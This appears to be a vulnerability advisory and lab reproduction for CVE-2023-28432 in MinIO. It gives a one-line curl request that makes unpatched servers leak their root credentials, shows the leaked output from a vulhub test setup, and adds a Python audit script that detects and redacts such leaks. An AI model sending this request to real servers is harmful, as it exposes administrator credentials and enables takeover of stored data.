MinIO is an object storage server compatible with Amazon S3.
Affected versions
2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z
This vulnerability exposes the administrator credentials and secret key completely and trivially.
You can use the docker-compose.yml from vulhub / CVE-2023-28432 to build a Docker PoC.
All it takes is:
curl -X POST http://localhost:9000/minio/bootstrap/v1/verify
Result:
{"MinioEndpoints":[{"Legacy":true,"SetCount":1,"DrivesPerSet":3, "Endpoints":[{"Scheme":"http","Opaque":"","User":null,"Host":"node1:9000", "Path":"/mnt/data1","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"", "Fragment":"","RawFragment":"","IsLocal":true},{"Scheme":"http","Opaque":"", "User":null,"Host":"node2:9000","Path":"/mnt/data2","RawPath":"","OmitHost":false, "ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false}, {"Scheme":"http","Opaque":"","User":null,"Host":"node3:9000","Path":"/mnt/data3", "RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"", "RawFragment":"","IsLocal":false}],"CmdLine":"http://node1:9000/mnt/data1 http://node2:9000/mnt/data2 http://node3:9000/mnt/data3", "Platform":"OS: linux | Arch: amd64"}],"MinioEnv":{"MINIO_ACCESS_KEY_FILE":"access_key","MINIO_CONFIG_ENV_FILE":"config.env", "MINIO_KMS_SECRET_KEY_FILE":"kms_master_key","MINIO_ROOT_PASSWORD":"minioadmin-vulhub","MINIO_ROOT_PASSWORD_FILE":"secret_key", "MINIO_ROOT_USER":"minioadmin","MINIO_ROOT_USER_FILE":"access_key","MINIO_SECRET_KEY_FILE":"secret_key"}}
If MinIO has been updated, the vulnerability is gone:
<ErrorResponse xmlns="https://sts.amazonaws.com/doc/2011-06-15/"><Error><Type></Type> <Code>MissingParameter</Code><Message>Invalid STS API version , expecting 2011-06-15</Message></Error><RequestId>175079BACD831544</RequestId></ErrorResponse>
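When auditing your own MinIO instances, the two responses above can be told apart programmatically, and the variables that need rotating can be listed without copying the secrets into a report. This is an added example, not part of the original post: classify_verify_response and the sample constants are hypothetical names, the sample bodies are constructed by abbreviating the responses shown above, and it assumes (from that sample output) that variables ending in _FILE hold only file names while the others hold literal values.

```python
import json

# Constructed samples, abbreviated from the two responses shown on this page.
VULNERABLE_BODY = (
    '{"MinioEndpoints":[{"Legacy":true,"SetCount":1,"DrivesPerSet":3}],'
    '"MinioEnv":{"MINIO_ACCESS_KEY_FILE":"access_key",'
    '"MINIO_ROOT_PASSWORD":"minioadmin-vulhub",'
    '"MINIO_ROOT_PASSWORD_FILE":"secret_key",'
    '"MINIO_ROOT_USER":"minioadmin"}}'
)
PATCHED_BODY = (
    '<ErrorResponse xmlns="https://sts.amazonaws.com/doc/2011-06-15/"><Error>'
    '<Code>MissingParameter</Code></Error></ErrorResponse>'
)


def classify_verify_response(body):
    """Classify a body returned by POST /minio/bootstrap/v1/verify.

    Returns a dict with:
      exposed - True when the body is JSON carrying a MinioEnv object
      rotate  - variables holding literal values (credentials to rotate)
      files   - *_FILE variables, which in the page's sample hold only file names
      env     - the same variables with every value redacted
    """
    result = {"exposed": False, "rotate": [], "files": [], "env": {}}
    try:
        doc = json.loads(body)
    except ValueError:
        return result  # not JSON, e.g. the XML ErrorResponse of an updated server
    env = doc.get("MinioEnv") if isinstance(doc, dict) else None
    if not isinstance(env, dict):
        return result
    result["exposed"] = True
    for name in sorted(env):
        # Assumption: *_FILE entries are pointers, everything else is a literal value.
        bucket = "files" if name.endswith("_FILE") else "rotate"
        result[bucket].append(name)
        result["env"][name] = "<redacted, %d chars>" % len(str(env[name]))
    return result


if __name__ == "__main__":
    for label, body in (("vulnerable", VULNERABLE_BODY), ("patched", PATCHED_BODY)):
        print(label, classify_verify_response(body))
```

Any instance that classifies as exposed should be updated, and every variable listed under rotate should be treated as compromised and changed.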